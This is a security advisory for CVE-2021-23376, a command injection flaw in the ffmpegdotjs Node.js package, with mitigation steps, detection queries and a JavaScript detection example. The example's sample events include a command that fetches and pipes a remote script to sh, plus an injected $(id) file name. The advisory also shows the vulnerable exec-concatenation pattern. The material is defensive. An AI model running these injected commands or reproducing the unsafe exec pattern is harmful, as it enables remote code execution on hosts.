CVE-2021-23376

9.8 CRITICAL

📋 TL;DR

CVE-2021-23376 is a critical command injection vulnerability in ffmpegdotjs, a Node.js wrapper around the ffmpeg command-line tool. Its trimvideo function builds an ffmpeg command line by string concatenation and runs it through child_process.exec, so shell metacharacters in untrusted input run as commands with the privileges of the Node.js process. All versions are affected and no fixed release has been published; any application that passes user-controlled data to trimvideo is at risk of host compromise.

💻 Affected Systems

Products:
  • ffmpegdotjs
Versions: All versions (no fixed release has been published)
Operating Systems: All operating systems running Node.js
Default Config Vulnerable: ⚠️ Yes
Notes: Vulnerability exists in default configuration when trimvideo function is used with user input.

📦 What is this software?

ffmpegdotjs is an npm package that wraps the ffmpeg command-line tool for Node.js. Its trimvideo function assembles an ffmpeg command line from the values it is given and executes it through child_process.exec, which is where the injection occurs.

⚠️ Manual Verification Required

The CVE record gives no fixed version and no bounded vulnerable range (the advisory states that all versions are affected), so automated version matching cannot clear a particular install.

Why? There is no "fixed in" version to compare against: if ffmpegdotjs is present in a project at all, treat it as vulnerable.

Recommended Actions:
  1. Review the CVE details at NVD
  2. Check vendor security advisories for your specific version
  3. Test if the vulnerability is exploitable in your environment
  4. Consider updating to the latest version as a precaution

⚠️ Risk & Real-World Impact

🔴

Worst Case

Full system compromise if the Node.js process runs as root/administrator (common in containers): data exfiltration, ransomware deployment, or destruction of the host.

🟠

Likely Case

Attacker executes commands with the same privileges as the Node.js process, potentially accessing sensitive data, installing malware, or pivoting to other systems.

🟢

If Mitigated

Limited impact if input validation and proper sandboxing are implemented, potentially restricting damage to the application's context.

🌐 Internet-Facing: HIGH - Web applications accepting user uploads or media processing requests are directly exposed to exploitation.
🏢 Internal Only: MEDIUM - Internal applications could still be exploited through authenticated users or other attack vectors.

🎯 Exploit Status

Public PoC: ⚠️ Yes
Weaponized: LIKELY
Unauthenticated Exploit: ⚠️ Yes
Complexity: LOW

Straightforward command injection: trimvideo concatenates its arguments into a single ffmpeg command string and passes it to child_process.exec, which runs it via /bin/sh -c. Shell metacharacters in any attacker-controlled argument (;, |, &&, $( ), backticks) are therefore executed. Exploitation only requires that trimvideo be reachable with attacker-controlled data, for example a user-supplied file name or trim offset.

🛠️ Fix & Mitigation

✅ Official Fix

Patch Version: None available

Vendor Advisory: https://github.com/TRomesh/ffmpegdotjs/security/advisories

Restart Required: No

Instructions:

  1. Remove ffmpegdotjs from your project (npm uninstall ffmpegdotjs), which also drops it from package.json and the lockfile.
  2. Replace it with a video-processing library that passes arguments to ffmpeg as an argv array (spawn/execFile) rather than as a shell string.
  3. Confirm nothing else pulls it in transitively (npm ls ffmpegdotjs) before redeploying.

🔧 Temporary Workarounds

Input Sanitization Wrapper

Platform: all

Validate every value before it reaches trimvideo, using an allowlist that rejects the input rather than stripping characters from it. Silent stripping turns "clip;rm -rf /.mp4" into a surprising but accepted name, and an allowlist that permits whitespace or a leading "-" still lets an attacker inject ffmpeg options even when no shell is involved.

// Example: accept only a plain media file name; reject everything else
const SAFE_NAME = /^[a-zA-Z0-9][a-zA-Z0-9._-]*$/;   // no leading '-', no spaces, no shell metacharacters
if (!SAFE_NAME.test(userInput)) throw new Error('invalid file name');

Replace child_process.exec with child_process.spawn

Platform: all

Use spawn (or execFile) with an explicit argument array instead of exec. Without a shell, ";", "|" and "$( )" in a value are just bytes in argv. Pass each value as its own array element; passing the whole user string as one element defeats the purpose, and values beginning with "-" must still be rejected because ffmpeg would parse them as options.

// Replace: exec('ffmpeg -i ' + input + ' -ss ' + start + ' ' + output)
// With:    spawn('ffmpeg', ['-i', input, '-ss', start, output])

🧯 If You Can't Patch

  • Implement strict input validation and sanitization for all user inputs passed to trimvideo function
  • Run the Node.js application with minimal privileges and in a containerized/sandboxed environment

🔍 How to Verify

Check if Vulnerable:

Look for the package in the manifest and in the lockfile (the lockfile also catches transitive dependencies):

grep -n ffmpegdotjs package.json package-lock.json

Check Version:

npm ls ffmpegdotjs

Any version listed is vulnerable; there is no fixed release to compare against.

Verify Fix Applied:

npm ls ffmpegdotjs no longer lists the package and node_modules/ffmpegdotjs is gone.

📡 Detection & Monitoring

Log Indicators:

  • Unusual child processes spawned by Node.js, in particular /bin/sh -c invocations (child_process.exec always goes through the shell) that run more than ffmpeg
  • ffmpeg or sh command lines containing shell metacharacters (;, |, &, $( ), backticks) or unexpected ffmpeg options
  • Bursts of trimvideo calls that fail with ffmpeg usage errors, consistent with probing crafted arguments

Network Indicators:

  • Outbound connections from Node.js process to unexpected destinations
  • Data exfiltration patterns

SIEM Query:

process.name:node AND (child_process.name:ffmpeg OR (child_process.name:sh AND command_line:*ffmpeg*)) AND (command_line:*;* OR command_line:*&* OR command_line:*|* OR command_line:*$(* OR command_line:*`*)

The OR branches must be parenthesized or the query matches any process with a metacharacter in its command line. Because child_process.exec runs the command through /bin/sh -c, the direct child of node is sh and ffmpeg is its grandchild, so a rule that only matches child_process.name:ffmpeg misses the injected invocation. Field names are illustrative; map them to your EDR or auditd schema.
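As an added example, not part of this advisory or of any vendor tooling, here is the logic behind the query above run over constructed process-creation events. The event fields (id, parent_name, name, command_line) are assumed and the NDJSON lines are made up for the example; the point it makes beyond the query is that the event to match is often sh -c, not ffmpeg.

```javascript
// Added example: detection logic for shell-metacharacter ffmpeg launches from Node.js.
// Field names are assumed; adapt parseEvents to your EDR/auditd schema.
const SHELL_META = /[;&|`<>]|\$\(/;          // shell operators: ; & | ` < > $(
const SHELL_BIN = /(^|\/)(sh|bash|dash)$/;   // exec() children look like this

// Constructed sample events (NDJSON), one per process creation.
const SAMPLE_NDJSON = [
  '{"id":1,"parent_name":"node","name":"ffmpeg","command_line":"ffmpeg -i clip.mp4 -ss 0 -t 5 out.mp4"}',
  '{"id":2,"parent_name":"node","name":"sh","command_line":"/bin/sh -c \\"ffmpeg -i clip.mp4 -ss 0 -t 5 out.mp4\\""}',
  '{"id":3,"parent_name":"node","name":"sh","command_line":"/bin/sh -c \\"ffmpeg -i clip.mp4; curl http://203.0.113.7/x.sh | sh; # -ss 0 -t 5 out.mp4\\""}',
  '{"id":4,"parent_name":"node","name":"sh","command_line":"/bin/sh -c \\"ffmpeg -i $(id).mp4 -ss 0 -t 5 out.mp4\\""}',
  '{"id":5,"parent_name":"cron","name":"sh","command_line":"/bin/sh -c \\"backup.sh | gzip\\""}',
].join('\n');

function parseEvents(ndjson) {
  return ndjson.split('\n').filter(Boolean).map((line) => JSON.parse(line));
}

// True when a Node.js parent launched ffmpeg, either directly or via a shell
// (as child_process.exec does), and the command line carries shell operators.
// Event 2 shows that exec() itself is not the signal: a clean command line
// through sh -c is benign; the metacharacters are what distinguish event 3.
function isSuspiciousFfmpegLaunch(ev) {
  if (ev.parent_name !== 'node') return false;
  const cmd = ev.command_line || '';
  const direct = ev.name === 'ffmpeg';
  const viaShell = SHELL_BIN.test(ev.name) && /\bffmpeg\b/.test(cmd);
  return (direct || viaShell) && SHELL_META.test(cmd);
}

// Returns the ids of flagged events; [3, 4] for the sample above.
function detect(ndjson) {
  return parseEvents(ndjson).filter(isSuspiciousFfmpegLaunch).map((ev) => ev.id);
}
```

Legitimate trimvideo calls on an unpatched system still show up as node -> sh -c "ffmpeg ..." (event 2), so alert on the metacharacter condition rather than on the shell child alone, and add the quoting rules of your log pipeline to SHELL_META if it escapes or strips these characters.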

🔗 References

  • NVD: https://nvd.nist.gov/vuln/detail/CVE-2021-23376
  • Vendor security advisories: https://github.com/TRomesh/ffmpegdotjs/security/advisories